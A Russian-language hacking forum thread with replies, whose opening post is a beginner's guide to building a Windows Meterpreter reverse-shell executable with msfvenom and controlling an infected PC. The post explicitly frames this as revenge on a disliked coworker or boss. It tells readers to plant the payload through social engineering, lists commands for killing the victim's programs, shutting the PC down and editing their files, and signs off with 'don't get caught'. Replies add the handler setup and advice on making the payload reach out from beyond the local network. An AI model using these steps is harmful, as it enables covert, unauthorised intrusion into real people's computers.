Управляем чужим ПК

T

to_0day

1567593183311.png


Добрый день, дорогие форумчане. Да, давно не было статей, но все же. Это будет скорее руководство по управлению зараженным компьютером. Приступим.

Введение

Допустим вы работаете в крупной компании или команде и вас начинает бесить ваш коллега/тимлид/начальник. Ну вы поняли. Вот и пришло время отомстить этому человеку за все его грехи. Если он кончено не особо осведомлен в области информационной безопасности. Но даже в таком случае мы можем скрыть наш вирус. Будем использовать традиционно Metasploit. Создадим полезную нагрузку (payload) для Windows. Да, в чем же суть этой статьи? Многие не особо шарят в этом деле и после заражения чужого ПК (если это произошло) не знают как работать. Поэтому я объясню все с нуля. Идем к практике.

Практика

Для начало нам надо запустить Kali Linux и естественно открыть терминал. После пишем данный код:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=Ваш IP LPORT=4444 -f exe -o название.exe

Объясняю где и что:

-p windows/meterpreter/reverse_tcp - полезная нагрузка
lport=4444 - порт куда будет идти обратное соединение
-f exe - формат нашей нагрузки
-o название.exe - сохранить код с названием по указанному адресу

И так. -p является обязательной частью нашего кода. Чтобы узнать целевой IP адрес пишем ifconfig. Для выведения полезных нагрузок вводим следующее:

msfvenom -l payloads

Дальше вы увидите список. Что делать знаете. Теперь после создания нашего вируса мы загружаем его на устройство нашего обидчика. Это делаете используя СИ. Заострять внимания не стану. Переходим к самой основной части. Управление компьютером жертвы.


Управление

И вот решающий момент. У нас открыта сессия Meterpreter и мы можем спокойно работать на устройстве. Что можно? К примеру проверим запущенные процессы. Вводим:

ps

И видим запущенные программы жертвы. Ну и допустим видим, что на компе запущен к примеру Microsoft World. Давайте вырубим его командой:

kill 1400

Число означает идентификатор запущенной программы. Вы их увидите при предыдущем запросе. Мало? Тогда давайте вырубим его комп:

shutdown

И тут уже будут подозрения на счет того, что комп сошел с ума. Это заставит нашу жертву подумать на счет своей безопасности. К примеру мы там нашли какой-нибудь текстовый документ. Давайте попробуем отредактировать его через vim. Пишем:

edit filename.txt

Где filename ставим название любого текстового документа расположенном на устройстве жертвы. Таким образом мы открываем его. Ну и допустим можете написать в нем что-то вроде:


Hi, you’ve been hacked.

Hacker Pr0_ogrammer //Здесь ставьте свое название


Короче, все зависит от вашей фантазии. Но... есть некоторые баги. Нам нужно перенести файл на рабочий стол. Запускаем командную консоль:

shell

И дальше пишем такой код:

notepad filename.txt

Ну и наслаждаемся результатом. Все очень просто, но и одновременно прикольно. Если кого-то заинтересовала такая тема можем продолжить.


Вывод

Данная тема больше рассчитана для новичков в этом деле, чем профессионалов. Это очевидно, но цель данной статьи немного расширить границы и дать начинающим хакерам немного полезной информации. И это только малая часть того на что способен Metasploit. Ну а на этом статья подошла к концу. Удачи, и не попадитесь ;)
 
Последнее редактирование модератором:
  • Нравится
Реакции: Virrn, FseOk и Bron Frol

HebiNeco

Green Team
31.08.2019
124
35
BIT
0
Будешь писать про Метасплоит дальше? Просьба, описывай подробнее, как запустить тот же метерпретер) Можно и загуглить, но так и статья будет подробнее и вопросов меньше
 

pp11

Green Team
16.09.2018
201
82
BIT
1
Я думал все об этом знают))
Ну реально, сделать малварь веномом с пэйлоадом метерпретера тема 16 года...
Стоит упомянуть, что есть в метерпретере команда help. Там хорошая справка.
 
  • Нравится
Реакции: Virrn

pp11

Green Team
16.09.2018
201
82
BIT
1
Будешь писать про Метасплоит дальше? Просьба, описывай подробнее, как запустить тот же метерпретер) Можно и загуглить, но так и статья будет подробнее и вопросов меньше
Код:
msfdb init

msfconsole

use exploit/multi/handler

set payload <payload>

set lhost <your ip>

set lport <port>

exploit
 
  • Нравится
Реакции: Tihon49
T

to_0day

Я думал все об этом знают))
Ну реально, сделать малварь веномом с пэйлоадом метерпретера тема 16 года...
Стоит упомянуть, что есть в метерпретере команда help. Там хорошая справка.
Ну по комментам не многие, но все же попробую на днях дать более годный материал)
 

KJhgIO

Заблокирован
02.08.2018
72
30
BIT
0
АХУ#####ТЬ, ЭТО ЧТО MSF??? ВОТ ЭТА ДАААААА, ДА ТЫ РЕАЛЬНЫЙ ХАКИР!!! 1!1!11!!1!1!1!1!!1!
Как насчёт написать статью про самостоятельную разработку эксплоитов, например?
Это будет куда интересней чем инструкция по использованию этого изъезженного инструмента.
Извиняюсь что так эмоционально, просто эти обзоры metasploit'а уже порядком надоели
И, да, для
новичков в этом деле
есть целый раздел с развёрнутыми инструкциями Metasploit Framework
А так, мог хотя бы показать как листенер на своём пк запустить или чем reverse_(protocol) отличается от bind_(protocol). "Новичкам" это будет полезно
 

HebiNeco

Green Team
31.08.2019
124
35
BIT
0
Ну по комментам не многие, но все же попробую на днях дать более годный материал)
Было бы интересно почитать, как эти эксплоиты устроены, как они вообще работают в системе жертвы и про их шифрование
 

id2746

Green Team
12.11.2016
436
644
BIT
23
Чтобы узнать целевой IP адрес пишем ifconfig.
ifconfig покажет не целевой адрес, а твой локальный, для lhost в полезной нагрузке, поправь.
раз пишешь для новичков (да и вообще кстати) то добавляй скрины, так понятнее и красивее
 

Bron Frol

Green Team
23.03.2019
53
75
BIT
6
Вместо того, что бы писать "спасибо" -- лучше поднимайте репутацию парню)
 
  • Нравится
Реакции: to_0day

Jeik Miller

One Level
17.04.2018
8
2
BIT
0
v7 privet 4toto powlo ne tak pomogite razberatsa v 4om problema kak ispravit
 

Вложения

  • Снимок экрана от 2019-09-06 17-43-36.png
    Снимок экрана от 2019-09-06 17-43-36.png
    241,5 КБ · Просмотры: 571

HebiNeco

Green Team
31.08.2019
124
35
BIT
0
v7 privet 4toto powlo ne tak pomogite razberatsa v 4om problema kak ispravit
Во-первых, смени раскладку. Так читать не очень приятно. Во-вторых, в чем именно у тебя проблема? Команда выполнена успешно и пейлоад сохранен в файл
 
  • Нравится
Реакции: id2746

Dream Dreams

One Level
22.07.2019
6
1
BIT
0
Ну в целом есть куча полных книг и статей по данному фремворку, даже не знаю что остается, переводить уже готовые книги? копипастить?
или может кто-то придумает новый вектор атаки для разнобразия*


UPD: видел вышел новый курс часов на 6-7 англ.
 

FormatC

One Level
18.06.2019
7
3
BIT
0
Скажите как сделать ратник который будет работаеть не только в локальной сети? А то при установке вместо RHOST и LHOST публичного IP адресса ставится 0.0.0.0.0
 

Bron Frol

Green Team
23.03.2019
53
75
BIT
6
Нужен белый ип для этого. Или поднимать туннель до внешки.

Всё это уже описывалось. Просто выполните поиск по форуму
 

Jeik Miller

One Level
17.04.2018
8
2
BIT
0
Нужен белый ип для этого. Или поднимать туннель до внешки.

Всё это уже описывалось. Просто выполните поиск по форуму
у мня бело ip как будед код в месте #>msfvenom -p windows/meterpreter/reverse_tcp (что здес писать LHOST или ? ) =127.0.0.1
 

wooolff

Green Team
19.02.2017
233
36
BIT
0
то делаете используя СИ. Заострять внимания не стану. ))) А мне аж интересно, как у терпилы ты его запустишь?)))
 
S

Sykoku

Микрософт ВорЛд? - Ню-ню.
Еще один диванный энерджайзер.
 

Bron Frol

Green Team
23.03.2019
53
75
BIT
6
у мня бело ip как будед код в месте #>msfvenom -p windows/meterpreter/reverse_tcp (что здес писать LHOST или ? ) =127.0.0.1

Подумай логически :)
Вот установил ты собранное приложение на тестируемый объект, который не находится в твоей локальной сети. Какой должен быть IP в приложении, что бы постучаться к тебе?

Внешний
 

standartis

New member
20.07.2019
2
0
BIT
0
АХУ#####ТЬ, ЭТО ЧТО MSF??? ВОТ ЭТА ДАААААА, ДА ТЫ РЕАЛЬНЫЙ ХАКИР!!! 1!1!11!!1!1!1!1!!1!
Как насчёт написать статью про самостоятельную разработку эксплоитов, например?
Это будет куда интересней чем инструкция по использованию этого изъезженного инструмента.
Извиняюсь что так эмоционально, просто эти обзоры metasploit'а уже порядком надоели
И, да, для
есть целый раздел с развёрнутыми инструкциями Metasploit Framework
А так, мог хотя бы показать как листенер на своём пк запустить или чем reverse_(protocol) отличается от bind_(protocol). "Новичкам" это будет полезно
Бро напиши если можешь лучше я буду благодарен если знаешь как и что делать, делай вещи :)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!